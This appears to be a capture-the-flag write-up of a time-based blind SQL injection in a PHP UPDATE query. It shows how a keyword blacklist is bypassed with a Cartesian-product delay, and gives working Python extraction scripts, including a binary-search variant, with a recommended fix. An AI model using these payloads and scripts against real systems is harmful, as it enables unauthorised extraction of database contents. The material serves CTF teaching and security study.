Fetching http://52.80.179.198:8080/www.tar.gz gives the source. In article.php there is an obvious SQL injection:
<?php
require 'conn.php';
$id = $_GET['id'];
// Blacklist: only these keywords are rejected (case-insensitive); quotes, comments,
// subqueries and the implicit comma join are all still allowed.
if(preg_match("/(sleep|benchmark|outfile|dumpfile|load_file|join)/i", $_GET['id']))
{
die("you bad bad!");
}
// The SELECT is safe: intval() reduces $id to an integer.
$sql = "select * from article where id='".intval($id)."'";
$res = mysql_query($sql);
if(!$res){
die("404 not found!");
}
$row = mysql_fetch_array($res, MYSQL_ASSOC);
// The UPDATE concatenates the raw $id: injectable, but its result is never displayed.
mysql_query("update view set view_times=view_times+1 where id = '".$id." '");
?>
The select statement wraps $id in intval(), so it cannot be injected, but the update statement concatenates the raw $id and is clearly exploitable. Its result is never shown and mysql_query() does not run stacked queries, so the only channel is time-based blind injection. sleep and benchmark are both filtered, but we can still make MySQL do enough work to produce a measurable delay, for example by computing the Cartesian product of a table with many rows such as information_schema.columns. The filter also blocks the keyword join, but a comma-separated FROM list is an implicit join and passes the check. Because the heavy subquery sits after an and, MySQL only evaluates it when the preceding condition is true, which is what turns the delay into a boolean oracle; the trailing # comments out the closing quote and space. Testing showed a clear delay. Payload:
update view set view_times=view_times+1 where id = '1' and 1 and (SELECT count(*) FROM information_schema.columns A, information_schema.columns B, information_schema.columns C)#
Final exploit script (the two commented-out payloads are the earlier stages: enumerating the table names of the current database, then the columns of the flags table). Note that the fix is simply to treat $id the same way in the update as in the select, i.e. intval() or a prepared statement, not to extend the blacklist:
import requests
import time

# A probe is "true" only when it runs into the timeout: a true comparison makes
# MySQL evaluate the three-way Cartesian product and the response takes far
# longer than 8 seconds; a false one returns almost immediately.
url = "http://52.80.179.198:8080/article.php"
charset = "abcdefghijklmnopqrstuvwxyz1234567890:_@,{}"
#payload = "1' and (ascii(mid((select group_concat(table_name) from information_schema.tables where table_schema=database()),{},1))={}) and (SELECT count(*) FROM information_schema.columns A, information_schema.columns B, information_schema.columns C)#"
#payload = "1' and (ascii(mid((select group_concat(column_name) from information_schema.columns where table_name='flags'),{},1))={}) and (SELECT count(*) FROM information_schema.columns A, information_schema.columns B, information_schema.columns C)#"
payload = "1' and (ascii(mid((select group_concat(flag) from flags),{},1))={}) and (SELECT count(*) FROM information_schema.columns A, information_schema.columns B, information_schema.columns C)#"

got = ""
for i in range(12, 46):  # character positions, as in the original run
    for ch in charset:
        try:
            requests.get(url, params={'id': payload.format(i, ord(ch))}, timeout=8)
        except requests.exceptions.Timeout:  # only a timeout counts as a hit
            got += ch
            print(got)
            time.sleep(2)  # let the heavy query finish before the next probe
            break
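The script above tries every character of the charset in turn, and every probe that hits costs a full timeout. As an added example (not part of the original writeup), the following generalises the same extraction with a binary search over the ASCII value, so each character needs exactly 7 probes instead of up to one per charset entry. It swaps the payload's `=` comparison for `>` and runs against a mock oracle with a constructed secret so it executes offline; `build_payload` shows what the real request would send, and the `flags` table, `flag` column and the secret value are assumptions for the example.

```python
# Added example: binary-search extraction for the heavy-query time oracle.
SECRET = "flag{cartesian_product_delay}"  # constructed sample value, not the real flag

HEAVY = ("(SELECT count(*) FROM information_schema.columns A, "
         "information_schema.columns B, information_schema.columns C)")


def build_payload(pos, value):
    """Injected id: the heavy subquery is only evaluated when the comparison is true."""
    return ("1' and (ascii(mid((select group_concat(flag) from flags),{},1))>{}) "
            "and {}#".format(pos, value, HEAVY))


def mock_oracle(pos, value):
    """Stand-in for the remote server: True means 'the request timed out'.

    Answers the question the payload asks, ascii(mid(SECRET, pos, 1)) > value,
    with pos 1-indexed as in MySQL. Past the end mid() returns '' and ascii('')
    is 0, so every comparison is False there.
    """
    if pos > len(SECRET):
        return False
    return ord(SECRET[pos - 1]) > value


def extract_char(oracle, pos, lo=0, hi=127):
    """Binary-search one character code in [lo, hi] using the oracle."""
    while lo < hi:
        mid = (lo + hi) // 2
        if oracle(pos, mid):  # code > mid
            lo = mid + 1
        else:
            hi = mid
    return lo


def extract(oracle, max_len=64):
    """Recover the string position by position; code 0 means end of string."""
    out = ""
    for pos in range(1, max_len + 1):
        code = extract_char(oracle, pos)
        if code == 0:
            break
        out += chr(code)
    return out


def extract_with_count(oracle, max_len=64):
    """Same as extract(), but also returns how many oracle probes were spent."""
    calls = [0]

    def counting(pos, value):
        calls[0] += 1
        return oracle(pos, value)

    return extract(counting, max_len), calls[0]


if __name__ == "__main__":
    result, probes = extract_with_count(mock_oracle)
    print(result, "recovered with", probes, "probes")
```

To run it against the real target, replace `mock_oracle` with a function that sends `build_payload(pos, value)` as the `id` parameter and returns True on `requests.exceptions.Timeout`; the search logic is unchanged. The end-of-string test relies on `ascii('')` being 0, which also bounds the loop when the data is shorter than `max_len`.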